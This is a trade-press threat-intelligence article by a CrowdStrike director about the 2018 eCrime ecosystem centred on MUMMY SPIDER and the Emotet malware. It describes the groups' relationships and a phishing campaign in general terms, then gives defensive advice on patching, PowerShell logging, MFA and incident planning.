Caught in the spider’s web: demystifying the eCrime cyber networkJohn Titmus, director EMEA at CrowdStrike, observes the rise of eCrime activities and explores what can be done to mitigate the risks
One thing was clear in 2018: law enforcement efforts have not yet halted or deterred eCrime actors and their cybercrime campaigns. Throughout the year CrowdStrike observed the rise of ‘Big Game Hunting’ tactics being leveraged in pursuit of financial payoff, along with a range of criminal adversaries engaging in notably more aggressive intrusions.
eCrime was prominent in 2018. Common adversaries operating within criminal networks were tracked conducting a range of operations such as crimeware distribution, banking Trojans, ransomware, point of sale compromises, and targeted spear-phishing campaigns. However, one of the most concerning eCrimes trends was the solidification of a prominent eCrime ‘ecosystem’.
Much like a nation-state, eCrime adversaries rarely work alone, and in 2018 the malware distribution threat MUMMY SPIDER solidified new and existing relationships, cementing the reality of a serious eCrime ecosystem of adversaries. MUMMY SPIDER now sits in the centre of a web of advanced eCrime adversaries which cover a range of attack tactic expertise, from ransomware, to point of sale, to banking trojans. Collaboration between these groups has only made the collective stronger, and in order to defeat them we need to understand the entire network.
In order to untangle this web of e-criminals, we need to find the driver of the network and understand their motivations and approaches to cyber-attacks, which in turn will allow us to understand what connects these actors together – and eventually cut the head off the snake.
Raising the stakes in the global cyber arms race
The head of the serpent: MUMMY SPIDER
MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. It first appeared in mid-2014, it swiftly became a formidable adversary by developing increasingly aggressive forms of malware. It does not follow typical criminal behaviour patterns, as it usually conducts attacks for a few months before going underground for a period of three to 12 months before returning with a new malware variant.
In 2017, the adversary made a conscious shift away from using banking trojans to a crimeware downloader service. Furthermore, in 2018 it made efforts to render its malware more resilient, and thus more attractive to potential ‘customers’. MUMMY SPIDER conducts regular waves of spam campaigns to spread Emotet: these campaigns often use general invoicing and payroll themes. Following infection, Emotet uses geo-targeting to determine which payload to deliver to the victim machine. Over the summer of 2018, in addition to supporting the download of TinyLoader, TrickBot and ZeuS Panda, CrowdStrike Intelligence observed Emotet infections propagating MUMMY SPIDER’s own SMB Spreader to machines in the US, Canada, Germany, UK, Japan and Australia.
In 2018, MUMMY SPIDER solidified its eCrime stronghold, arming itself with a web of pre-existing and new relationships with other adversaries. It continued supporting WIZARD SPIDER (Russian based threat group) through the latter half of the year, while adding geo-targeting distribution for BokBot (LUNAR SPIDER – Eastern European-based operator and developer of banking malware) and Gozi ISFB. INDRIK SPIDER (a sophisticated eCrime group that has been operating Dridex since June 2014) was also seen to continue its historic relationship with MUMMY SPIDER during 2018, although downloads of Dridex by Emotet remain rare. Other members of this established network include Individual Operators such as Panda Zeus, Nymaim and Gootkit.
Cyber security best practice: Definition, diversity, training, responsibility and technology
Into the tangled web: why multiple spiders are worse than one
In order to illustrate why a network of e-criminals presents a greater challenge for those within the cyber-security industry, we can use a recent example of MUMMY SPIDER activity to demonstrate. In November 2018, a significant phishing campaign was identified which was having widespread effects. Based on the sheer volume of victims, it turned out to be one of the largest Emotet campaigns that have ever been observed by a cyber-security firm. CrowdStrike was able to attribute this activity with high confidence to MUMMY SPIDER. . CrowdStrike uses the naming convention ‘SPIDER’ to identify eCriminal groups around the globe.
The phishing campaign by MUMMY SPIDER consisted of a malicious macro-enabled Microsoft Word document sent as an email attachment. When recipients opened the weaponised document and macros are enabled on the machine which is quite typical, an obfuscated PowerShell command was launched. This command allowed an Emotet dropper to be installed through a remote C2 infrastructure, which in turn downloaded the Emotet malware as the first-stage implant. Once infected, more malware was able to infiltrate the system based on its geographic location.
Where the ecosystem came into play was the second-stage malware download. One of the downloads, TrickBot, is attributed to the eCrime actor group WIZARD SPIDER. The other second-stage download, BokBot, is attributed to the eCrime actor LUNAR SPIDER. What intelligence can tell is, is that these groups cooperate with MUMMY SPIDER to gain access to Emotet’s victims. MUMMY SPIDER breaks down the door into a weak system, and in turn, allows a flurry of smaller groups to scurry in to take advantage of a vulnerability and execute further criminal activities whilst the system is vulnerable.
Furthermore, the spiders web does not stop with MUMMY SPIDER’s immediate associates, we must also consider the further connections which these groups have. For instance, INDRIK SPIDER has known connections to TINY SPIDER and SKELETON SPIDER, both which benefit from distributed malware from INDRIK.
The true cost of cybercrime? $5.2 trillion apparently
Don’t get ensnared: avoid falling into the eCrime web
Whilst the web of e-criminals may seem daunting, there are a range of best practices which businesses can consider in order to protect themselves against these double fronted attacks. If the first adversary cannot break through your barriers, its network will remain out of the loop as well;
• Develop a post-recovery strategy: Recovery is not the last step in remediating a ransomware attack — as this event clearly illustrates. Organisations need to know how the adversary got in before they can be sure they were successfully ejected.
• Build an incident plan: Review and test that plan to make sure it’s up to date and its relevant for the threats that face your organisation. Running table top simulations improves reaction times and having Incident response retainers ensures you have relevant support.
• Upgrade operating systems: CrowdStrike constantly sees organisations compromised because they haven’t upgraded to supported operating systems or applied relevant critical patches. The savings gained by stretching the life of an outdated system are not worth the risks. Bolstering your defences around these devices can provide some additional protection while working on the upgrade plan.
• Upgrade to PowerShell V5 and remove previous versions: Logging in this version of PowerShell is so robust that security teams can see commands being executed in real time. If companies would update to V5 across the enterprise, their own security teams could see what is happening and respond right away. Also, removing previous versions of PowerShell in the enterprise will aid in preventing downgrade attacks. This is the same for other applications on your network. Security hygiene is a key to success in improving how your network operates.
• Leverage multi-factor authentication (MFA) for all users and privilege access management tools: Make it as difficult as possible for adversaries to get access to and leverage both user and admin credentials from outside your network. Once they have those, they can do whatever they want in the environment. In addition to MFA, a more robust privilege access management process will limit the damage adversaries can do if they get in.
There are many things that can be done to reduce the risk of intrusion and employee programs can also assist with this. If you don’t have all the resources you need consider working with a 3rd party who offer services such as Table Top exercises, compromise assessments and Incident response retainers to demonstrate your maturity and hopefully reduce or prevent incidents in your environment.
Nominations are OPEN for the Tech Leaders Awards, organised by Information Age and taking place on 12th September 2019 at the Royal Lancaster, London. Categories include CIO of the Year, CTO of the Year, Digital Leader of the Year and Security Leader of the Year. Recognise and reward excellence in the tech industry by submitting a nomination today